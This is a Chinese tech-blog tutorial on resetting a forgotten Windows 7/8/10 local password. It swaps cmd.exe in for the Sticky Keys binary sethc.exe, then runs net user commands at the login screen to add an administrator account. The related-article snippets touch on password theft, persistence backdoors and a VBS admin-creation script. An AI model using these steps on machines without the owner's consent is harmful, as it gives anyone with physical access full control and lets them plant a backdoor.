Loading [MathJax]/jax/output/CommonHTML/config.js
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >无需借助任何设备破解Win7、Win8、Win10开机密码

无需借助任何设备破解Win7、Win8、Win10开机密码

作者头像
Lcry
发布于 2022-11-29 08:38:37
发布于 2022-11-29 08:38:37
1.5K00
代码可运行
举报
文章被收录于专栏:Lcry个人博客Lcry个人博客
运行总次数:0
代码可运行

一想到开机密码,很多人忘记了就会采用PE,但是有时候并不是随身携带一个PE的U盘,接下来就介绍一种方法给大家,可以解决忘记密码。

实现原理: 利用重命名sethc.exe文件为cmd.exe,创建一个新的账户提升管理员权限修改原密码。

WIN7操作步骤: 1)正常开机,当windows出现开机logo时强制关机、然后再开机后选择启动修复、 2)启动自动修复耐心等待一会,当出现“你想使用系统还原恢复计算机时”选择取消 3)然后显示问题详情,拉到底部打开最后一个链接 4)点击打开文件-直接定向到C:/windows/system32下 5)先将cmd文件改成aaa,再将sethc文件改成cmd,改完重启 6)到了登录界面,直接连续按5次‘shift’出现命令行 7)使用下面命令添加或修改用户密码:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
net user lcry lcry123 /add //添加一个用户为lcry,密码为lcry123的用户
net localgroup Administrators lcry /add  //提升lcry为超级管理员
net user   //查看所有用户,确认lcry创建成功

8)使用新用户登进去改掉以前用户的密码,然后需要还原cmdsethc,还原aaacmd

WIN8、WIN10操作步骤: 1)原理一样、唯一不同的,win8.win10直接使用高级功能里面的命令提示符 2)正常开机,当windows出现开机logo时强制关机,选择高级选项-疑难解答-高级选项-命令提示符 3)在管理员窗口输入diskpart回车,再输入list volume回车 输入exit退出diskpart工具,此操作主要确认系统盘的盘符标示。 4)定位到cd C:Windows\System32,将cmd文件改成aaa,再将sethc文件改成cmd,改完重启 5)到了登录界面,直接连续按5次‘shift’出现命令行 6)使用下面命令添加或修改用户密码:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
net user lcry lcry123 /add //添加一个用户为lcry,密码为lcry123的用户
net localgroup Administrators lcry /add  //提升lcry为超级管理员
net user   //查看所有用户,确认lcry创建成功

7)使用新用户登进去改掉以前用户的密码,然后需要还原cmdsethc,还原aaacmd

注:win8和win10若是网络用户直接联网找回密码即可,此方法针对的是本地账户密码忘记。

大功告成~~~2018年9月21日亲测成功

参考链接: https://jingyan.baidu.com/article/e75aca8500c345142fdac67a.html https://blog.csdn.net/xiaoaps/article/details/79963389 https://jingyan.baidu.com/article/0aa223756cd2e388cc0d6436.html

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2018-09-21,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
不借用外置设备---破解windows 10开机密码
现在说说破解windows 10的开机密码,我们同样是采用调用“粘滞键”的方法进行破解,windows 10和windows 7破解起来多少还是有点不同,而最大的不同就是windows 10用户可能是
用户1456630
2018/05/25
10.5K1
利用连按 5 下 Shift 漏洞破解 win7 开机密码(原理以及实现)
其实按下 5 次 shift 弹出的 粘带键 是一个程序,路径在 C:\Windows\System32\sethc.exe ,只要将其替换为cmd就可以为所欲为了。 在非法关机下,下次启动会提示 ,点击修复这个时候就是最高管理权限,所有使用cmd就没有限制了,但是如果已经修复了的系统是无法完成利用这个漏洞修改用户开机密码的
用户9006224
2022/12/21
1.2K0
利用连按 5 下 Shift 漏洞破解 win7 开机密码(原理以及实现)
破解 Windows 系统密码
找到D:\system32下的sethc文件,将其重命名为sethc.bak或者其他任意名字即可
LuckySec
2022/11/02
2.4K0
破解 Windows 系统密码
win10的NET Framework 3.5离线安装
win10的操作系统无法找到用户和组,无法获取管理员权限       1、使用“Win+R”快捷键或右键单击左下角,进入运行界面;输入“netplwiz”进入用户帐户设置界面。   2、选择要增加权限的账户,点击属性。   3、点击组成员,点选“管理员”。   这样就能把一般的标准帐户升级为管理员帐户了,用户可以获得使用和设置的权限。同理,想解除管理员权限,也是通过这样的步骤来完成。 ———————————————— MS酋长很早以前已经分享了《Win10离线安装.NET Framework 3.5的方法技巧》,同时分享了exe格式的.NET Framework 3.5离线安装包下载地址。但有部分网友反映安装过程中会出现错误提示安装失败,那么今天MS酋长就再分享一下cab格式的.NET Framework 3.5离线安装包下载地址,以及安装方法。
用户3519280
2023/07/06
4.3K0
win10的NET Framework 3.5离线安装
怎么破解电脑的开机密码
在开机时,按下F8进入”带命令提示符的安全”模式 输入”NET USER+用户名+123456/ADD”可把某用户的密码强行设置为”123456″
用户7162790
2022/03/23
1.8K0
Windows 密码抓取方式总结
渗透测试过程中我们经常需要获取管理员的账号密码,以便进行更进一步的操作,下面我将给大家总结几种 steal account 的手法!其中可能也会涉及到 apt 的内容,希望大家喜欢。
信安之路
2018/08/08
3.1K0
Windows 密码抓取方式总结
绕过反病毒添加管理员用户小结
我们在后渗透中时常会遇到这样的环境,即使成功拿到了目标机器的Admin/System权限后也不能添加用户和管理员组,出现这种情况的原因有很多,如:UAC、WAF、反病毒软件或者是net.exe降权和安全组策略中的软件限制、应用程序控制策略等。
潇湘信安
2021/01/22
3.6K0
绕过反病毒添加管理员用户小结
windows 10 DD包制作
1. 环境与工具 本地环境 windows 10 专业版 64位 开启Hyper-V https://jingyan.baidu.com/article/15622f24017461fdfdbea554.html (Hyper-V主要是开启远程,亦可用VNC操作) 工具 windows 10 镜像 VirtIO驱动 https://fedorapeople.org/groups/virt/virtio-win/direct-downloads/stable-virtio/virtio-win.iso Dis
用户1202364
2018/07/09
3.2K0
Windows常见的持久化后门汇总
持久化后门是指当入侵者通过某种手段拿到服务器的控制权之后,通过在服务器上放置一些后门(脚本、进程、连接之类),来方便他以后持久性的入侵,简单梳理一下日常遇见windows用的比较多的一些持久化方式方便以后排查问题使用.
洛米唯熊
2020/06/16
2.8K0
浅谈windows提权
但是使用net localgroup administrators或者“计算机管理” 就可以查看使用$创建的隐藏用户
字节脉搏实验室
2020/07/20
1.2K0
利用Ubuntu启动U盘破解Windows开机密码
这篇文章给大家介绍如何利用Ubuntu启动U盘(或光盘)巧妙破解windows开机密码。如果你不小心忘记了密码但又不想重装系统,那么这个方法能让你在不重装的前提下重置密码。
字节脉搏实验室
2020/05/12
2.7K0
利用Ubuntu启动U盘破解Windows开机密码
windows系统 用户与组管理 (自用
KID.
2023/12/25
4360
windows 小技巧搜集(不定期更新)
1、更改cmd的默认路径 你可以在注册表的“HKEY_CURRENT_USER\Software\Microsoft\CommandProcessor” 下面新建一个名为AutoRun的字串,并设置该字串值为 cd /d "C:\Users\june\Desktop" 来改变该默认路径。 下次用CMD进入DOS提示符窗口,默认路径就是 C:\Users\june\Desktop 了。 2、windows8 锁屏时间及其超时关闭显示器时间 锁屏后超时关闭屏幕时间: Windows Registry Edito
用户1177713
2018/02/24
3.7K0
忘记了 Windows 登录密码,如何重置?
是山河呀
2025/03/09
1.8K1
忘记windows7开机密码破解windows7登陆解决方案
点评:破解 windows 7登陆密码主要解决两个问题: 1.PE或DOS认不到硬盘2.net user 命令不成功SATA的硬盘可能会让你的PE找不到,方法是修改BIOS中的SATA设定,找到后把后面的AHCI改成RAD(好像是这个名,基本就是上下选择,选择不是AHCI的那个值),有些硬盘值可能
Enjoy233
2019/03/05
5.6K0
win10/win8换win7教程
重做系统相信很多小伙伴都get到了这个技能,U启动、大白菜、Ghost安装器…blablabla…一大堆。很多方法都可以帮助你重新换一个系统,但是在预装win8换win7的时候,小伙伴们可能会遇到这样一个问题:按照往常的方法装完系统重启电脑之后找不到系统了,硬盘启动项也找不到了,黑屏了。别慌,下面就教你怎么解决这个问题。
谭庆波
2018/08/10
7140
win10/win8换win7教程
如何破解PC电脑笔记本开机密码
方法一: 利用U盘破解电脑开机密码 1、下载U盘启动盘制作工具,制作个U盘启动盘 2、进入PE界面,选择直接破解 3、或者进入PE系统,然后再运行自带破解清除密码工具
知识与交流
2023/03/25
1.2K0
如何破解PC电脑笔记本开机密码
win8的备份和还原
从win8刚出的时候手贱买了个98块钱的序列号,到新本子到手觉得不能浪费银子,就装了win8,尝尝鲜后就扔一边了,要折腾还是台式机舒坦。
空空裤兜
2023/03/03
1.5K0
vbs远程木马_vbs 访问webservice
大家好,又见面了,我是你们的朋友全栈君。 xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本+提权VBS 整理收集 2010年12月07日   xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本   vbson error resume next   const HKEY_LOCAL_MACHINE = &H80000002   strComputer = “.”   Set StdOut = WScript.StdOut   Set oReg=GetObject(“winmgmts:{impersonationLevel=impersonate}!\\” &_   strComputer & “\root\default:StdRegProv”)   strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server”   oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath   strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp”   oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath   strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp”   strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server”   strValueName = “fDenyTSConnections”   dwValue = 0   oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue   strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp”   strValueName = “PortNumber”   dwValue = 3389   oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue   strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp”   strValueName = “PortNumber”   dwValue = 3389   oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue   on error resume next   dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username=”HackEr”:password=”393214425″:end if:set wsnetwork=CreateObject(“WSCRIPT.NETWORK”):os=”WinNT://”&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&”/Administrators,group”):Set od=ob.Create(“user”,username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&”/”&username&”,user”):oe.Add(of.ADsPath)’wscript.echo of.ADsPath   On Error Resume Next   Dim obj, success   Set obj = CreateObject(“WScript.Shell”)   success = obj.run(“cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cm
全栈程序员站长
2022/09/29
2.5K0
Windows 系统安全
目前,Windows 系统已经占据了绝大部分的桌面市场,同时在服务器市场也占有较大比重。长期以来,由于病毒攻击、黑客入侵等原因,给人们留下了易受攻击的不好印象。本文将以 Windows 系统安全方面展开分享一些 Windows 系统安全防护措施。
LuckySec
2022/11/02
2.9K0
Windows 系统安全
相关推荐
不借用外置设备---破解windows 10开机密码
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验